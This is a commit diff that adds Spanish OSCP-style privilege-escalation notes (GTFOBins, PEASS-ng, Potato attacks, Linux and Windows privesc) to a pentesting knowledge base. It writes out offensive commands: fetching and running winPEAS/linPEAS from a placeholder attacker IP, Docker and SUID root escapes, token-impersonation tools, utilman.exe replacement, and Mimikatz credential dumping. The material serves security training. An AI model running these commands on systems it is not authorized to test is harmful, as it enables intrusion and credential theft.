saber: pack de metodologia publico (conocimiento/) + doc del RAG
El repo trae ahora ~73 docs de metodologia de pentesting (estilo OSCP, scrubeados de datos personales) que indexa.py indexa: un clon recien hecho ya sabe de enumeracion, explotacion web, shells, privesc, Active Directory, cracking... con los comandos, sin ningun dato privado. docs/rag.md lo refleja.
This commit is contained in:
parent
12987539a4
commit
7e06ce46cf
76 changed files with 2682 additions and 8 deletions
18
nucleo/saber/conocimiento/04 - Privesc/GTFOBins y LOLBAS.md
Normal file
18
nucleo/saber/conocimiento/04 - Privesc/GTFOBins y LOLBAS.md
Normal file
|
|
@ -0,0 +1,18 @@
|
|||
# GTFOBins y LOLBAS
|
||||
|
||||
> Las dos chuletas que conviertes en privesc/ejecución usando binarios legítimos.
|
||||
|
||||
## GTFOBins (Linux) — https://gtfobins.github.io
|
||||
- Dado un binario con SUID, `sudo`, o capability → cómo abusarlo para shell/leer/escribir como root.
|
||||
- Flujo: `sudo -l` o `find / -perm -4000` → buscas el binario en GTFOBins.
|
||||
- Ejemplo mental: `vim`, `find`, `less`, `python` con SUID → root trivial.
|
||||
|
||||
## LOLBAS (Windows) — https://lolbas-project.github.io
|
||||
- "Living Off the Land Binaries": binarios firmados de Windows para descargar/ejecutar/bypassear.
|
||||
- Útil para Transferencia de ficheros y evadir controles (`certutil`, `bitsadmin`, `mshta`...).
|
||||
|
||||
## Cómo encaja
|
||||
- Privesc Linux → GTFOBins es el segundo paso de casi todo SUID/sudo.
|
||||
- Privesc Windows → LOLBAS para vivir de la tierra.
|
||||
|
||||
Relacionado: Recursos públicos · OSCP MOC
|
||||
21
nucleo/saber/conocimiento/04 - Privesc/PEASS-ng.md
Normal file
21
nucleo/saber/conocimiento/04 - Privesc/PEASS-ng.md
Normal file
|
|
@ -0,0 +1,21 @@
|
|||
# PEASS-ng (winPEAS / linPEAS)
|
||||
|
||||
> Scripts que **enumeran automáticamente** todos los vectores de privesc. En `tu carpeta`.
|
||||
|
||||
## Subir y ejecutar
|
||||
```bash
|
||||
# Kali (servir): cd tu carpeta && python3 -m http.server 80 → Transferencia de ficheros
|
||||
```
|
||||
```powershell
|
||||
# Windows:
|
||||
iwr http://TU_IP/winPEASx64.exe -OutFile C:\Windows\Temp\wp.exe ; C:\Windows\Temp\wp.exe
|
||||
```
|
||||
```bash
|
||||
# Linux:
|
||||
wget http://TU_IP/linpeas.sh -O /tmp/lp.sh ; bash /tmp/lp.sh
|
||||
```
|
||||
|
||||
## Regla de oro
|
||||
**Automatizado + manual.** winPEAS resalta lo sospechoso (rojo/amarillo), pero **revisa a mano** Privesc Windows / Privesc Linux: winPEAS no encuentra todo (ej. lógica de un script cron concreto).
|
||||
|
||||
Relacionado: GTFOBins y LOLBAS · Metodología OSCP · OSCP MOC
|
||||
24
nucleo/saber/conocimiento/04 - Privesc/Potato attacks.md
Normal file
24
nucleo/saber/conocimiento/04 - Privesc/Potato attacks.md
Normal file
|
|
@ -0,0 +1,24 @@
|
|||
# Potato attacks
|
||||
|
||||
> Cuando `whoami /priv` muestra **SeImpersonatePrivilege** o **SeAssignPrimaryTokenPrivilege** → abuso de token a **NT AUTHORITY\SYSTEM**.
|
||||
|
||||
## El gatillo
|
||||
```
|
||||
whoami /priv → busca SeImpersonatePrivilege = Enabled
|
||||
```
|
||||
Típico en cuentas de servicio (IIS, MSSQL `sa`, etc.).
|
||||
|
||||
## La familia
|
||||
```
|
||||
JuicyPotato → Windows antiguos
|
||||
PrintSpoofer → Windows 10/Server 2016-2019 (servicio de impresión)
|
||||
GodPotato → moderno, muy fiable hoy
|
||||
RoguePotato / RottenPotato → variantes
|
||||
```
|
||||
|
||||
## Uso típico (GodPotato/PrintSpoofer)
|
||||
```
|
||||
GodPotato.exe -cmd "cmd /c whoami"
|
||||
PrintSpoofer.exe -i -c cmd
|
||||
```
|
||||
Subes el .exe con Transferencia de ficheros.
|
||||
25
nucleo/saber/conocimiento/04 - Privesc/Privesc Linux.md
Normal file
25
nucleo/saber/conocimiento/04 - Privesc/Privesc Linux.md
Normal file
|
|
@ -0,0 +1,25 @@
|
|||
# Privesc Linux
|
||||
|
||||
> Tras el foothold (Reverse shell + Estabilizar shell TTY): script automatizado (PEASS-ng) **+** revisión manual. Paso 4 de la Metodología OSCP.
|
||||
|
||||
## Los 10 olvidados
|
||||
```
|
||||
1. sudo -l → SIEMPRE primero, sin password
|
||||
2. SUID exóticos → find / -perm -4000 2>/dev/null → GTFOBins y LOLBAS
|
||||
3. Capabilities → getcap -r / 2>/dev/null (cap_setuid en python/perl = root)
|
||||
4. Cron escribibles → /etc/crontab, /var/spool/cron (scripts que puedes editar)
|
||||
5. Wildcard injection → tar czf /backup/* con --checkpoint
|
||||
6. PATH abuse → script SUID llama "ps" sin ruta → creas ./ps malicioso
|
||||
7. NFS no_root_squash → showmount -e ; montas y subes un SUID
|
||||
8. Docker group → docker run -v /:/mnt -it alpine chroot /mnt (= root)
|
||||
9. Kernel exploits → último recurso: DirtyCow, DirtyPipe (uname -a; searchsploit)
|
||||
10. Ficheros sensibles → /etc/passwd escribible, /etc/shadow legible, /var/backups
|
||||
```
|
||||
|
||||
## Orden recomendado
|
||||
`sudo -l` → SUID/caps + GTFOBins y LOLBAS → cron → resto. **Kernel exploit = último recurso** (inestable) → Exploits conocidos.
|
||||
|
||||
## Herramientas
|
||||
`linpeas.sh` (PEASS-ng), `LinEnum`, `linux-exploit-suggester` (LES), `lse.sh`, y `pspy` (espía cron/procesos sin root). Ver Herramientas (índice).
|
||||
|
||||
Relacionado: Exploits conocidos · PEASS-ng · Privesc Windows · OSCP MOC
|
||||
41
nucleo/saber/conocimiento/04 - Privesc/Privesc Windows.md
Normal file
41
nucleo/saber/conocimiento/04 - Privesc/Privesc Windows.md
Normal file
|
|
@ -0,0 +1,41 @@
|
|||
# Privesc Windows
|
||||
|
||||
> Tras la Reverse shell PowerShell: PEASS-ng (winPEAS) **+** revisión manual. Camino a SYSTEM.
|
||||
|
||||
## Los 10 olvidados
|
||||
```
|
||||
1. whoami /priv → SeImpersonate/SeAssignPrimaryToken → Potato attacks
|
||||
2. Unquoted services → wmic service get name,pathname,startmode
|
||||
path con espacios sin comillas + carpeta escribible = exe propio
|
||||
3. AlwaysInstallElev. → reg query HKLM\...\Windows\Installer (ambos =1 → msi = SYSTEM)
|
||||
4. Service permisos → accesschk.exe -uwcqv user * (SERVICE_CHANGE_CONFIG)
|
||||
5. Creds en disco → Unattend.xml, sysprep.inf, web.config, cmdkey /list, SAM/SYSTEM
|
||||
6. AutoLogon registro → HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
|
||||
7. Pass spraying → la pass del user normal contra admin/administrator/sa
|
||||
8. WSL / OpenSSH → credenciales en .bash_history
|
||||
9. Scheduled tasks → schtasks /query /fo LIST /v (scripts editables)
|
||||
10. UAC bypass + token impersonation
|
||||
```
|
||||
|
||||
## Privilegios de token (SeXxxPrivilege)
|
||||
```
|
||||
SeImpersonate / SeAssignPrimaryToken → Potato attacks
|
||||
SeBackupPrivilege → lees ficheros restringidos (copias SAM/SYSTEM, NTDS.dit)
|
||||
SeRestorePrivilege → escribes donde quieras: sustituye utilman.exe por cmd.exe
|
||||
SeDebugPrivilege → vuelcas LSASS → Mimikatz
|
||||
SeTakeOwnership → te apropias de objetos protegidos
|
||||
```
|
||||
|
||||
## Otras técnicas (del sitio)
|
||||
- **DLL hijacking**: servicio que carga una DLL por ruta insegura → pones tu DLL (msfvenom `-f dll`) y reinicias el servicio.
|
||||
- **UAC bypass** vía `eventvwr.exe` (hijack de registro) cuando ya tienes código en un user del grupo Administrators.
|
||||
- **Unattend.xml / cmdkey / registro** → credenciales en disco (ya en los 10 olvidados).
|
||||
|
||||
## Herramientas
|
||||
`PowerUp`, `PrivescCheck`, `Sherlock` (PowerShell) + `accesschk.exe` (SysInternals) → ver Herramientas (índice) y PEASS-ng.
|
||||
|
||||
## Tras conseguir SYSTEM
|
||||
- Mimikatz → `sekurlsa::logonpasswords` → hashes/creds de dominio.
|
||||
- Esas creds → Movimiento lateral y Active Directory.
|
||||
|
||||
Relacionado: Potato attacks · Exploits conocidos · PEASS-ng · Privesc Linux · OSCP MOC
|
||||
Loading…
Add table
Add a link
Reference in a new issue